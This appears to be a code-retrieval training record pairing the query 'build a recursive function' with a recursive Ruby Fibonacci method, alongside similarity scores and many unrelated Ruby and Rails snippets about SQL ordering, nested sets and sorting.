"def self_and_descendants\n # using _left_ for both sides here lets us benefit from an index on that column if one exists\n nested_set_scope.where(\n arel_table[primary_column_name].eq(self.primary_id).or(arel_table[total_order_column_name].gteq(total_order)).\n and(arel_table[total_order_column_name].lt(snumv/denv)))\n end",
"def initialize\n\t super # need to do this so other parts of AR's initialize method run first\n\t self = self.where(type: \"School\") # does this work? 'type' used to be a reserved word in earlier Rails\n\t # or \n\t # self = self.select{ |data| data.type == \"school\" }\n end",
"def custom_queries\n @custom_queries ||= ::Valkyrie::Persistence::CustomQueryContainer.new(query_service: self)\n end",
"def special\n override\n end",
"def full_set(special=nil)\n if special && special[:exclude]\n exclude_str = \" AND NOT (#{base_set_class.sql_for(special[:exclude])}) \"\n elsif new_record? || self[right_col_name] - self[left_col_name] == 1\n return [self]\n end\n base_set_class.find(:all, :conditions => \"#{scope_condition} #{exclude_str} AND (#{left_col_name} BETWEEN #{self[left_col_name]} AND #{self[right_col_name]})\", :order => left_col_name)\n end",
"def initialize(parent, new_query = {}, name = nil)\n if parent.is_a? Base\n raise \"Name must be provided for view to be initialized\" if name.nil?\n @name = name\n @database = parent.database\n @query = { :reduce => false }\n elsif parent.is_a? View\n @database = parent.database\n @query = parent.query.dup\n else\n raise \"View cannot be initialized without a parent Model or View\"\n end\n @query.update(new_query)\n super\n end",
"def self_and_ancestors\n nested_set_scope.where(\"#{self.class.table_name}.lft <= ? AND #{self.class.table_name}.rgt >= ?\", lft, rgt)\n end",
"def inherited(subclass)\n super\n subclass.instance_variable_set(:@gauges, @gauges)\n end",
"def execute\n super()\n end",
"def default_filter(iter)\n iter.parent[0] < 0 ? \" #{@where_fields}=#{iter.parent.parent[0]} \" :\n \" #{@where_fields}=#{iter.parent[0]} \"\n\n end",
"def altered()\n puts \"CHILD, BEFORE PARENT altered()\" \n super() # calls the super function so the program will use the function defined in the parent class\n puts \"CHILD, AFTER PARENT altered()\"\n end"
] |
[
"0.67301923",
"0.65505743",
"0.63372445",
"0.63266003",
"0.59769773",
"0.5874502",
"0.5688907",
"0.56794375",
"0.5635255",
"0.5566433",
"0.5540747",
"0.5530601",
"0.5455237",
"0.5409443",
"0.5393406",
"0.5370838",
"0.536498",
"0.53544056",
"0.535165",
"0.53295875",
"0.5307537",
"0.5285948",
"0.5261138",
"0.5234533",
"0.5228194",
"0.5165459",
"0.5160044",
"0.5150416",
"0.5139393",
"0.5138619",
"0.5134832",
"0.51218575",
"0.51093405",
"0.5099999",
"0.50753385",
"0.50747037",
"0.50730556",
"0.5059311",
"0.5058358",
"0.50566304",
"0.50520396",
"0.50501555",
"0.5040771",
"0.5020508",
"0.5006889",
"0.49840185",
"0.49836498",
"0.49828824",
"0.49761975",
"0.49621665",
"0.49535248",
"0.49522617",
"0.49459475",
"0.49399707",
"0.4930799",
"0.49275798",
"0.49224553",
"0.49092892",
"0.49088544",
"0.49083707",
"0.49063468",
"0.49034575",
"0.49011853",
"0.48913997",
"0.48802063",
"0.4877537",
"0.48720443",
"0.48703662",
"0.48697153",
"0.486772",
"0.4863037",
"0.48499998",
"0.48392364",
"0.48324865",
"0.48200855",
"0.48200855",
"0.48049274",
"0.47906083",
"0.47905287",
"0.47874704",
"0.47825593",
"0.47760963",
"0.47758815",
"0.47749603",
"0.47679138",
"0.47669777",
"0.47663346",
"0.47603792",
"0.47549286",
"0.4748166",
"0.4743242",
"0.47411337",
"0.47395104",
"0.4738123",
"0.47320765",
"0.4730863",
"0.4722367",
"0.47153804",
"0.47138622",
"0.47095743"
] |
0.5228065
|
25
|
Required method on the child class. Specify the default SQL ORDER BY clause for all results here, e.g. "strategy_data->>'bill_acted_on' DESC"
|
def default_order
raise NotImplementedError
end
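
A child class satisfies this contract by returning an ORDER BY fragment. A minimal sketch, reusing the JSONB column and key from the example in the query above (they are illustrative, not a fixed schema):

def default_order
  # Postgres JSONB text extraction, newest acted-on bills first
  "strategy_data->>'bill_acted_on' DESC"
end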
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def ordering_query; end",
"def order_clause\n col = case sort_params[:sort_col]\n when 'title'\n 'data_management_plans.title'\n when 'funder'\n 'affiliations_fundings.name'\n else\n 'data_management_plans.updated_at'\n end\n { \"#{col}\": :\"#{sort_params[:sort_dir]}\" }\n end",
"def get_order_by\n @order_by\n end",
"def ordering_sql_string\n\t\tif order\n\t\t\torder.collect{|col,dir| absolute_column_name( col ) + ((dir.eql?(:asc))?(''):(' DESC')) if item_class.column_names.include?( col ) }.compact.join(',')\n\t\tend\n\tend",
"def ordering_query\n \"#{sql_length}(#{slug_column}) ASC, #{slug_column} ASC\"\n end",
"def order_by=( val )\n @order_by = val.blank? ? \"#{table_name}.created_at DESC\" : val\n end",
"def typus_order_by\n\n order = []\n\n begin\n fields = self.send(\"admin_order_by\").map { |a| a.to_s }\n rescue\n config = Typus::Configuration.config[self.name]\n return \"`#{self.table_name}`.id ASC\" unless config && config['order_by']\n fields = config['order_by'].split(', ')\n end\n\n fields.each do |field|\n order_by = (field.include?(\"-\")) ? \"`#{self.table_name}`.#{field.delete('-')} DESC\" : \"`#{self.table_name}`.#{field} ASC\"\n order << order_by\n end\n\n return order.join(', ')\n\n end",
"def orders\n \"assetcode ASC\"# \"staffgrade_id ASC\"\n end",
"def column_order_by\n @@column_order_by\n end",
"def to_cql\n \"ORDER BY #{@field} #{@dir.to_s.upcase}\"\n end",
"def order_by(*props)\n @query[:order_by] = props.join(',')\n self\n end",
"def summary_order_by(params, options)\n case params[:order_by].to_s\n when \"orig_name\" then\n order_by = \"u.first_name\"\n when \"orig_calls\" then\n order_by = \"total_calls\"\n when \"orig_exec_billsec\" then\n order_by = \"exact_billsec\"\n when \"orig_billsec\" then\n order_by = \"originator_billsec\"\n when \"orig_price\" then\n order_by = \"originator_price\"\n\n when \"term_name\" then\n order_by = \"provider_name\"\n when \"term_calls\" then\n order_by = \"total_calls\"\n when \"term_exec_billsec\" then\n order_by = \"exact_billsec\"\n when \"term_billsec\" then\n order_by = \"provider_billsec\"\n when \"term_price\" then\n order_by = \"provider_price\"\n else\n options[:order_by] ? order_by = options[:order_by] : order_by = \"\"\n end\n without = order_by\n\n order_by = \"users.first_name \" + (options[:order_desc] == 1 ? \"DESC\" : \"ASC\") + \", users.last_name\" if order_by.to_s == \"users.first_name\"\n\n order_by += \" ASC\" if options[:order_desc] == 0 and order_by != \"\"\n order_by += \" DESC\" if options[:order_desc] == 1 and order_by != \"\"\n return without, order_by\n end",
"def sort_clause\n sorter.to_sql\n end",
"def apply_sorting(relation)\n relation.order(@q.sorting.to_sql)\n end",
"def arel_order\n text_columns = if params[:order]\n params[:order].split(' ')\n elsif self.default_sort\n [self.default_sort].flatten\n else\n [model_class.primary_key].flatten\n end\n sort_columns = text_columns.map do |column|\n if column.to_s.include?('.')\n name,direction = column.to_s.split('.',2)\n raise \"Illegal sort direction: #{direction} in #{column}\" unless %w{asc desc}.include?(direction)\n table[name].send(direction)\n else\n table[column]\n end\n end\n sort_columns\n end",
"def order(order_str:)\n @order_by = \"ORDER BY #{order_str}\"\n end",
"def order_by(ids, klass=nil)\n column = namespaced_column(:id, klass)\n if ids.empty?\n nil\n elsif ::ActiveRecord::Base.is_mysql_adapter?\n \"FIELD(#{column},#{ids.join(',')})\"\n else\n order = ''\n ids.each_index { |i| order << \"WHEN #{column}=#{ids[i]} THEN #{i+1} \" }\n \"CASE \" + order + \" END\"\n end\n end",
"def ordering_by\n order && order.to_s.gsub(/^(ascend|descend)_by_/, '')\n end",
"def agregate_order_by(params, options)\n case params[:order_by].to_s\n when \"direction\" then\n order_by = \"destinations.direction_code\"\n when \"destination\" then\n order_by = \"destinations.name\"\n when \"customer_orig\" then\n order_by = \"nice_user\"\n when \"customer_term\" then\n order_by = \"terminators.name\"\n when \"billed_orig\" then\n order_by = \"originating_billed\"\n when \"billed_term\" then\n order_by = \"terminating_billed\"\n when \"billsec_orig\" then\n order_by = \"originating_billsec\"\n when \"billsec_term\" then\n order_by = \"terminating_billsec\"\n when \"duration\" then\n order_by = \"duration\"\n when \"answered_calls\" then\n order_by = \"answered_calls\"\n when \"total_calls\" then\n order_by = \"total_calls\"\n when \"asr\" then\n order_by = \"asr\"\n when \"acd\" then\n order_by = \"acd\"\n else\n options[:order_by] ? order_by = options[:order_by] : order_by = \"\"\n end\n\n without = order_by\n order_by = \"users.first_name \" + (options[:order_desc] == 1 ? \"DESC\" : \"ASC\") + \", users.last_name\" if order_by.to_s == \"users.first_name\"\n order_by = \"ds.direction_code \" + (options[:order_desc] == 1 ? \"DESC\" : \"ASC\") + \", ds.name\" if order_by.to_s == \"destinations.name\"\n order_by = \"ds.direction_code \" + (options[:order_desc] == 1 ? \"DESC\" : \"ASC\") + \", ds.subcode\" if order_by.to_s == \"destinations.name\"\n order_by = \"t.name\" if order_by.to_s == \"terminators.name\"\n\n order_by += \" ASC\" if options[:order_desc] == 0 and order_by != \"\"\n order_by += \" DESC\" if options[:order_desc] == 1 and order_by != \"\"\n return without, order_by\n end",
"def sort_order\n super\n end",
"def sorted\n all.order(Arel.sql(%[ #{quoted_table_name}.\"recorded_at\" ASC, #{quoted_table_name}.\"hid\" ASC ]))\n end",
"def asc\n from(default_table).asc\n end",
"def orders\n \"staffgrade_id ASC\"\n end",
"def orders\n \"staffgrade_id ASC\"\n end",
"def sorting\n sort_no = 0\n sorts = []\n\n loop do\n sorted = false\n name_col = \"iSortCol_#{sort_no}\"\n name_mode = \"sSortDir_#{sort_no}\"\n sort_col = @dts[name_col]\n break if !sort_col\n\n col_name = @columns[sort_col.to_i]\n next if !col_name\n\n if @dts[name_mode] == \"desc\"\n sort_mode = \"DESC\"\n else\n sort_mode = \"ASC\"\n end\n\n if match = col_name.to_s.match(/^(.+)_id$/)\n method_name = match[1]\n sub_model_name = StringCases.snake_to_camel(col_name.slice(0, col_name.length - 3))\n\n if Kernel.const_defined?(sub_model_name)\n sub_model_const = Kernel.const_get(sub_model_name)\n unless @joins.key?(method_name)\n @query = @query.includes(method_name)\n @joins[method_name] = true\n end\n\n @sort_columns.each do |sort_col_name|\n if sub_model_const.column_names.include?(sort_col_name.to_s)\n sorts << \"`#{sub_model_const.table_name}`.`#{escape_col(sort_col_name)}` #{sort_mode}\"\n sorted = true\n break\n end\n end\n end\n end\n\n if @model.column_names.include?(col_name.to_s)\n sorts << \"`#{@model.table_name}`.`#{escape_col(col_name)}` #{sort_mode}\"\n elsif @args[:sort]\n res = @args[:sort].call(:key => col_name, :sort_mode => sort_mode, :query => @query)\n @query = res if res\n else\n raise \"Unknown sort-column: '#{col_name}'.\"\n end\n\n sort_no += 1\n end\n\n @query = @query.order(sorts.join(\", \"))\n end",
"def default_sort\n if results_limit\n order(MasterRank).limit(results_limit)\n else\n order(MasterRank).all\n end\n end",
"def ordered_by(statement)\n @expected_options[:order] = statement\n self\n end",
"def column_to_order_by(column)\n @@column_order_by = column || \"updated_at\"\n\n define_method(:column_order_by) do\n @@column_order_by\n end\n end",
"def add_order_by_for_association_limiting!(sql, options)\n return sql if options[:order].blank?\n\n order = options[:order].split(',').collect { |s| s.strip }.reject(&:blank?)\n order.map! {|s| $1 if s =~ / (.*)/}\n order = order.zip((0...order.size).to_a).map { |s,i| \"alias_#{i}__ #{s}\" }.join(', ')\n\n sql << \" ORDER BY #{order}\"\n end",
"def getSortingOrder #:doc:\n sorting = @default_sorting.dup\n ordering = [\"DESC\", \"ASC\", \"ASC\", \"ASC\"] # default ordering\n \n if @queryparams[:sort_by]\n # get given sort_by-values\n sorts = @queryparams[:sort_by].split(\" \")\n # get given order-values and make sure sorts.size == orders.size\n orders = Array.new(sorts.size, \"DESC\")\n if @queryparams[:order]\n orders = @queryparams[:order].split(\" \")\n if orders.size < sorts.size\n orders += Array.new(sorts.size - orders.size, \"DESC\")\n elsif orders.size > sorts.size\n orders = orders.slice(0, sorts.size)\n end\n orders.each do |o|\n if not (o.upcase == \"ASC\" or o.upcase == \"DESC\") then o = \"ASC\" end\n end \n end\n \n # first sort_by-value has to be processed last (so it gets first on the list)\n sorts = sorts.reverse\n orders = orders.reverse\n \n # check sort_by-values\n sorts.each_index do |i|\n if @sort_by.has_key?(sorts[i])\n # move the sort-attribute to first\n sort_value = @sort_by[sorts[i]]\n ind = sorting.index(\"LOWER(\" + @sort_by[sorts[i]] + \")\")\n if ind != nil\n sorting.delete_at(ind)\n ordering.delete_at(ind)\n sort_value = \"LOWER(\" + sort_value + \")\"\n end\n sorting.unshift(sort_value)\n ordering.unshift(orders[i].upcase)\n end\n end\n end\n \n #combine everything together\n returnable = sorting[0] + \" \" + ordering[0]\n sorting.each_index do |i|\n next if i == 0\n returnable += \", \" + sorting[i] + \" \" + ordering[i]\n end\n return returnable\n end",
"def order_by\n ActiveSupport::StringInquirer.new(@params[:order_by]) unless @params[:order_by].nil?\n end",
"def company_order\n {updated_at: :desc}\n end",
"def order_by(property_name)\n query_proxy = OData::Model::QueryProxy.new(self)\n query_proxy.order_by(property_name.to_sym)\n end",
"def order_by\n if params[:order_by]\n if params[:order_by] == 'created_at'\n # If created at, get newest first\n params[:order_by] + ' DESC'\n else\n # Otherwise, get closest to now\n params[:order_by] + ' ASC'\n end\n else\n # Default to start date, ascending\n 'starts_at ASC'\n end\n end",
"def set_order\n unless params[:order_by]\n @order = @model.typus_order_by\n else\n @order = \"#{params[:order_by]} #{params[:sort_order]}\"\n end\n end",
"def order_by_field\n self.find_field(self.order_by)\n end",
"def default_ordering(field_name)\n case field_name\n when \"status\"; return(\"ascending\")\n when \"from\"; return(\"ascending\")\n when \"subject\"; return(\"ascending\")\n when \"date\"; return(\"descending\")\n end \n end",
"def sort_column\n super \"Room\", \"sort_order\"\n end",
"def sort_column\n super \"Room\", \"sort_order\"\n end",
"def responses_order\n if custom_view? && params[:order_column].blank?\n custom_view.sorted_display_field_custom_views.inject({}) do |hash, s|\n hash.merge elastic_sort(\"df_#{s.display_field_id}.raw\", s.sort_direction)\n end\n else # fall back on date if we have no other recourse\n elastic_sort(order_column, order_dir)\n end\n end",
"def ordered_expression_sql(oe)\n \"#{literal(oe.expression)} #{oe.descending ? 'DESC' : 'ASC'}\"\n end",
"def sort\n @sort ||= if order_by_primary_key?\n # Default order is by id DESC\n :desc\n else\n # API defaults to DESC order if param `sort` not present\n request_context.params[:sort]&.to_sym || :desc\n end\n end",
"def default_sort\n { order: :created_at, direction: :desc }\n end",
"def apply_search_order( ds, options )\n\t\tif (( fields = options[:order] ))\n\t\t\tds = ds.to_a.sort_by do |uuid|\n\t\t\t\t@storage[ uuid ].values_at( *fields.compact ).map {|val| val || ''}\n\t\t\tend\n\t\tend\n\n\t\treturn ds\n\tend",
"def default_sort_order\n ::Mincer.config.sorting.order_attribute\n end",
"def add_order_by_for_association_limiting!(sql, options)\n return sql if options[:order].blank?\n\n order = options[:order].split(',').collect { |s| s.strip }.reject(&:blank?)\n order.map! { |s| 'DESC' if s =~ /\\bdesc$/i }\n order = order.zip((0...order.size).to_a).map { |s,i| \"id_list.alias_#{i} #{s}\" }.join(', ')\n\n sql.replace \"SELECT * FROM (#{sql}) AS id_list ORDER BY #{order}\"\n end",
"def add_order_by_for_association_limiting!(sql, options)\n return sql if options[:order].blank?\n\n order = options[:order].split(',').collect { |s| s.strip }.reject(&:blank?)\n order.map! { |s| 'DESC' if s =~ /\\bdesc$/i }\n order = order.zip((0...order.size).to_a).map { |s,i| \"id_list.alias_#{i} #{s}\" }.join(', ')\n\n sql.replace \"SELECT * FROM (#{sql}) AS id_list ORDER BY #{order}\"\n end",
"def add_order_by_for_association_limiting!(sql, options)\n return sql if options[:order].blank?\n\n order = options[:order].split(',').collect { |s| s.strip }.reject(&:blank?)\n order.map! { |s| 'DESC' if s =~ /\\bdesc$/i }\n order = order.zip((0...order.size).to_a).map { |s,i| \"id_list.alias_#{i} #{s}\" }.join(', ')\n\n sql.replace \"SELECT * FROM (#{sql}) AS id_list ORDER BY #{order}\"\n end",
"def sorted\n all.order(%[ #{quoted_table_name}.\"recorded_at\", #{quoted_table_name}.\"hid\" ])\n end",
"def order_by *columns\n @order += [columns].flatten\n end",
"def order(*args)\n sql_records = records.__send__ :order, *args\n end",
"def index_sort_order\n @query = {}\n @query['sort_key'] = params['sort_key'] unless params['sort_key'].blank?\n\n if @query['sort_key']&.starts_with?('-')\n \"#{@query['sort_key'].delete_prefix('-')} DESC\"\n elsif @query['sort_key'].present?\n \"#{@query['sort_key']} ASC\"\n else\n 'updated_at DESC'\n end\n end",
"def order; end",
"def order; end",
"def set_conditions_and_sort_order(query, sdb_type)\n conditions = [\"simpledb_type = '#{sdb_type}'\"]\n # look for query.order.first and insure in conditions\n # raise if order if greater than 1\n\n if query.order && query.order.length > 0\n query_object = query.order[0]\n #anything sorted on must be a condition for SDB\n conditions << \"#{query_object.property.name} IS NOT NULL\" \n order = \"order by #{query_object.property.name} #{query_object.direction}\"\n else\n order = \"\"\n end\n\n query.conditions.each do |operator, attribute, value|\n operator = case operator\n when :eql then '='\n when :not then '!='\n when :gt then '>'\n when :gte then '>='\n when :lt then '<'\n when :lte then '<='\n else raise \"Invalid query operator: #{operator.inspect}\" \n end\n conditions << \"#{attribute.name} #{operator} '#{value}'\"\n end\n [conditions,order]\n end",
"def sort_order\n sortable_column_order do |column, direction|\n if resource_handler.model_associations.present? && column.match(/\\./)\n table, column = column.split('.')\n if resource_handler.model_associations.detect { |a| a.table_name == table }\n \"#{table}.#{column} #{direction}\"\n else\n fallback_sort_order(direction)\n end\n elsif resource_handler.model.column_names.include?(column.to_s)\n \"#{resource_handler.model.table_name}.#{column} #{direction}\"\n else\n fallback_sort_order(direction)\n end\n end\n end",
"def order_by(column, order)\n return resource().order(column.to_s + \" \" + order)\n end",
"def default_sort\n 'name asc'\n end",
"def default_sort\n 'created_at desc'\n end",
"def selects_all_bears_names_and_orders_in_alphabetical_order\n 'SELECT bears.name FROM bears ORDER BY name'\nend",
"def order_by(order_by)\n @order_bys << CGI.escape(order_by)\n self\n end",
"def order_by( &block )\n @order_by = block\n order\n self\n end",
"def sort_sql_helper(param)\n return param.gsub('_reverse',\" DESC\")\n end",
"def order_by(attribute)\n @order_by = Dynamicloud::API::Criteria::OrderByClause.asc(attribute)\n self\n end",
"def ordered_by(attribute_name)\n ordering[attribute_name]\n end",
"def apply_sort(query, table, column_name, allowed, direction)\n validate_query_table_column(query, table, column_name, allowed)\n validate_sorting(column_name, allowed, direction)\n\n # allow sorting by field mappings\n sort_field = @build.build_custom_calculated_field(column_name)&.fetch(:arel)\n sort_field = table[column_name] if sort_field.blank?\n\n if sort_field.is_a? String\n sort_field\n elsif direction == :desc\n Arel::Nodes::Descending.new(sort_field)\n else\n #direction == :asc\n Arel::Nodes::Ascending.new(sort_field)\n end => sort_field_by\n\n query.order(sort_field_by)\n end",
"def to_find_order\n if @order.blank?\n nil\n else\n @order.collect do |col|\n col.respond_to?(:full_name) ? (col.full_name + (col.negative? ? \" DESC\" : \"\")) : col\n end.join(\", \")\n end\n end",
"def sort_and_order_sql\n {:sort => ATTACH_MAPPING[@sort], :order => @order}\n end",
"def ordered(data)\n field, ordering = sanitize_ordering(data, field_suffix: :AT)\n\n dtf = params.dig(:query, :filter, :date_time_filter) || {}\n if (dtf.keys - [field]).any?\n raise SquareLite::MismatchedParams.new(sort_field: data, date_time_filter: dtf)\n end\n\n params.bury(:query, :sort, sort_field: field, sort_order: ordering)\n self\n end",
"def add_sort_field(*) super end",
"def sort(table_name, list, sort_by, order, per_page, default)\r\n\r\n if table_name.has_attribute?(sort_by) && (order == \"asc\" || order == \"desc\")\r\n list = list.sort_by{|item| item[sort_by].to_s.downcase}\r\n if order == \"desc\"\r\n list = list.reverse\r\n end\r\n list \r\n else\r\n # default case\r\n list.sort_by{|item| item[default].downcase}\r\n end\r\n\r\n end",
"def sort_order # rubocop:disable Metrics/AbcSize, Metrics/MethodLength\n col = sort_column\n # do a case-insensitive sort if we are sort on last name\n col = \"lower(#{col})\" if col.include?('last_name')\n return Arel.sql(\"#{col} #{sort_direction}\") unless col.include?('enumerations')\n\n klass, method = col.split('.')\n values = klass.singularize.capitalize.constantize.send(method.intern)\n .order(Arel.sql(\"value #{sort_direction} \")).pluck('value')\n order_query = values.each_with_index.inject(+'CASE ') do |memo, (val, i)| # rubocop:disable Style/EachWithObject\n memo << \"WHEN( enumerations.value = '#{val}') THEN #{i} \"\n memo\n end\n Arel.sql(\"#{order_query} ELSE #{values.length} END\")\n end",
"def add_sort_order_to_title\n return unless params[:by]\n\n self.title_tag = :query_title_all_by\n title_args[:order] = :\"sort_by_#{params[:by].sub(/^reverse_/, \"\")}\"\n end",
"def order_by_cached_appeal_priority_clause\n Arel.sql(<<-SQL)\n (CASE\n WHEN cached_appeal_attributes.case_type = 'Court Remand' THEN 1\n ELSE 0\n END) DESC,\n cached_appeal_attributes.is_aod DESC,\n cached_appeal_attributes.docket_number ASC\n SQL\n end",
"def columns_order(klass)\n columns_symbol = klass.columns.map {|e| e.name.intern}\n\n # created_at and updated_at should be at the very end by default\n if columns_symbol.include? :created_at\n columns_symbol = (columns_symbol - [:created_at]) + [:created_at]\n end\n if columns_symbol.include? :updated_at\n columns_symbol = (columns_symbol - [:updated_at]) + [:updated_at]\n end\n\n if requested_order = AdminData.config.columns_order[klass.name]\n primary_key = klass.send(:primary_key).intern\n order = [primary_key] + requested_order\n order.uniq!\n # add the columns not covered by user at the end of the list\n sorted_columns = order + (columns_symbol - order)\n sorted_columns.map(&:to_s)\n else\n columns_symbol.map(&:to_s)\n end\n end",
"def all\n relation.order(\"CASE WHEN property_type IN ('land', 'mobile_home') THEN 1 ELSE 0 END, selling_date DESC\")\n end",
"def calls_sort_option\n column = case params[:iSortCol_0].to_s\n when '1'\n 'number'\n when '2'\n 'caller_id'\n when '3'\n 'providers.name'\n when '4'\n 'answered'\n when '5'\n 'busy'\n when '6'\n 'audio_length'\n when '7'\n 'ring_length'\n end\n column + ' ' + (params[:sSortDir_0] =~ /^A/i ? 'asc' : 'desc') if column\n end",
"def custom_sql\n \"SELECT bookings.full_name FROM bookings ORDER BY checkin DESC LIMIT 1;\"\nend",
"def default_order\n \"name\"\n end",
"def sort_column\n #songs_count is a specific query, so it's not in the Song table\n default = (params[:sort] == \"songs_count\") ? \"songs_count\" : \"name\"\n Song.column_names.include?(params[:sort]) ? params[:sort] : default\n end",
"def set_sortorder(order)\n puts \"RFilter.set_sortorder is DEPRECATED - use RFilter.set_sort_by_and_order instead\"\n self.sql_sortorder = order\n end",
"def condition_sort(input)\n poke_name = input.poke_name\n product_db = SearchRecord::For.klass(Entity::Product)\n case input.sort\n when 'id'\n product_db.find_full_name(poke_name)\n when 'likes_DESC'\n product_db.order_by_desc_likes(poke_name)\n when 'likes_ASC'\n product_db.order_by_asc_likes(poke_name)\n when 'rating_DESC'\n product_db.order_by_desc_rating(poke_name)\n when 'rating_ASC'\n product_db.order_by_asc_rating(poke_name)\n when 'price_DESC'\n product_db.order_by_desc_price(poke_name)\n else\n # priceASC\n product_db.order_by_asc_price(poke_name)\n end\n end",
"def sort_column\n \n @sort_field = ''\n if params[:sort].to_s == MadConstants.donor_name\n @sort_field = 'concat(donours.first_name,donours.last_name)'\n elsif params[:sort].to_s == MadConstants.donation_amount\n @sort_field = 'donations.donation_amount'\n elsif params[:sort].to_s == MadConstants.donation_type\n @sort_field = 'donations.donation_type'\n elsif params[:sort].to_s == MadConstants.product\n @sort_field = 'cfr_products.name'\n elsif params[:sort].to_s == MadConstants.fundraiser_name\n @sort_field = 'users.first_name'\n elsif params[:sort].to_s == MadConstants.donation_status\n @sort_field = 'donations.donation_status'\n elsif params[:sort].to_s == MadConstants.eighty_g_required\n @sort_field = 'donations.eighty_g_required'\n else\n @sort_field = 'donations.id' \n end\n \n Donation.joins(:donour).joins('inner join cfr_products as cfr_products on cfr_products.id = donations.product_id').\n joins('inner join users as users on users.id = donations.fundraiser_id').\n cfr_txn_search(params[:search]).order(@sort_field + ' ' + sort_direction).\n paginate(:per_page => 10, :page => params[:page])\n end",
"def order\n end",
"def order_by_column\n target_class.clustering_columns.first.name if target_class.clustering_columns.any?\n end",
"def order_by_column\n target_class.clustering_columns.first.name if target_class.clustering_columns.any?\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def order(*args)\r\n args.map!{ |arg| arg.is_a?(Hash) ? arg.map{ |k,v| \"#{k} #{v.upcase}\"} : arg }\r\n order = args.flatten(2).join(\", \")\r\n\r\n rows = connection.execute <<-SQL\r\n SELECT * FROM #{table}\r\n ORDER BY #{order};\r\n SQL\r\n\r\n rows_to_array(rows)\r\n end",
"def orders\n super.complete.order('completed_at DESC, id DESC')\n end",
"def desc\n if @order_by.nil?\n raise Exceptions::IllegalStateException, 'You must call order_by method before call this method'\n end\n\n @order_by.asc = false\n\n self\n end",
"def order_by(class_name)\n if class_name == 'Group'\n 'name'\n elsif class_name == 'EmailMessage'\n 'subject' # TODO or add created_at to model and use as sort field\n else \n 'id'\n end\n end",
"def order(*args)\n sql_records = records.__send__ :order, *args\n\n # Redefine the `to_a` method to the original one\n #\n sql_records.instance_exec do\n define_singleton_method(:to_a) do\n if defined?(::ActiveRecord) && ::ActiveRecord::VERSION::MAJOR >= 4\n self.load\n else\n self.__send__(:exec_queries)\n end\n @records\n end\n end\n\n sql_records\n end",
"def search_get_order_sql(sort_by, order_by, default)\n sql = []\n\n sort_by.each_with_index do |value, index|\n next if value.blank?\n next if order_by[index].blank?\n\n sql.push( \"#{ActiveRecord::Base.connection.quote_table_name(table_name)}.#{ActiveRecord::Base.connection.quote_column_name(value)} #{order_by[index]}\" )\n end\n\n if sql.blank?\n sql.push(\"#{ActiveRecord::Base.connection.quote_table_name(table_name)}.#{ActiveRecord::Base.connection.quote_column_name(default)}\")\n end\n\n sql.join(', ')\n end"
] |
[
"0.7568424",
"0.698313",
"0.6902242",
"0.6886363",
"0.66674477",
"0.6592575",
"0.6558681",
"0.6516834",
"0.65005857",
"0.64718646",
"0.64700437",
"0.6464869",
"0.64216065",
"0.6406529",
"0.6398351",
"0.63810825",
"0.63709253",
"0.636094",
"0.6352644",
"0.6337956",
"0.6326532",
"0.62711793",
"0.62477636",
"0.62477636",
"0.6233016",
"0.6219032",
"0.62167567",
"0.62037575",
"0.61896515",
"0.61851966",
"0.61841863",
"0.61733377",
"0.61673",
"0.6165263",
"0.6162077",
"0.6147631",
"0.6138932",
"0.6138721",
"0.6138721",
"0.6128456",
"0.61206067",
"0.6105761",
"0.61045176",
"0.6098472",
"0.6097312",
"0.60942125",
"0.60942125",
"0.60942125",
"0.60803175",
"0.6068937",
"0.6063763",
"0.6061862",
"0.6056947",
"0.6056947",
"0.60532653",
"0.60464144",
"0.60404783",
"0.6040121",
"0.6030552",
"0.6018192",
"0.6016262",
"0.6006497",
"0.6003439",
"0.6000568",
"0.59906596",
"0.59814304",
"0.59749395",
"0.59722984",
"0.5964931",
"0.59569025",
"0.59568787",
"0.5952323",
"0.59290314",
"0.5928589",
"0.59214246",
"0.59183997",
"0.59154874",
"0.59149164",
"0.5913507",
"0.591341",
"0.58992726",
"0.58923763",
"0.588792",
"0.5884922",
"0.5881628",
"0.5881628",
"0.58792967",
"0.58792967",
"0.58792967",
"0.58792967",
"0.58792967",
"0.58792967",
"0.58792967",
"0.58792967",
"0.5870357",
"0.5857288",
"0.58553964",
"0.585229",
"0.5851783",
"0.58477193"
] |
0.5925506
|
74
|
build a recursive function
|
def fibs(j, k)
  @goal = 4000000           # upper bound for the largest term generated
  i = j
  j = k
  k = i + j                 # next Fibonacci term
  unless k > @goal
    @fib_array << k         # @fib_array must be initialized by the caller (e.g. @fib_array = [1, 1]) before the first call
    fibs(j, k)
  end
end
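
A self-contained variant of the same recursion, passing the accumulator and limit as arguments instead of relying on instance variables; the names `collect_fibs`, `limit`, and `acc` are illustrative and not from the source:

# Recursively collect Fibonacci terms not exceeding `limit`,
# starting from the two seed values `j` and `k`.
def collect_fibs(j, k, limit, acc = [])
  next_term = j + k
  return acc if next_term > limit

  acc << next_term
  collect_fibs(k, next_term, limit, acc)
end

collect_fibs(1, 1, 4_000_000) # => [2, 3, 5, 8, 13, ...]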
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def recursive => nil",
"def recursive_solution\n\n end",
"def generate_recursive(length)\n _generate(length, 0, '')\nend",
"def recursive_factorial(number)\n\nend",
"def recursive_factorial(number)\n\nend",
"def fibonacciRecurse(a,b,depth)\n\tif depth>0\n\t\treturn String(a+b)+\" \"+fibonacciRecurse(b, a+b, depth-1)\n\telse\n\t\treturn \"\"\n\tend\nend",
"def factorials_rec(num)\n # p num\n # p \"num #{num} \"\n if num <= 0\n return [1]\n end\n if num == 1\n return [1]\n end\n if num == 2\n return [1, 1]\n end\n # p factorial(3)\n # factorial = num-1 * factorials_rec(num-2)\n # p factorial\n return factorials_rec(num-1) + [factorial(num-1)]\n \nend",
"def build_tree(arr)\n\tend",
"def recursive_print(array)\n\nend",
"def factorials_rec(num)\n return 'error' if num < 0\n return [1] if num == 1\n return [1, 1] if num == 2\n fac = factorials_rec(num - 1)\n fac << fac.last * (num - 1)\n fac\n\nend",
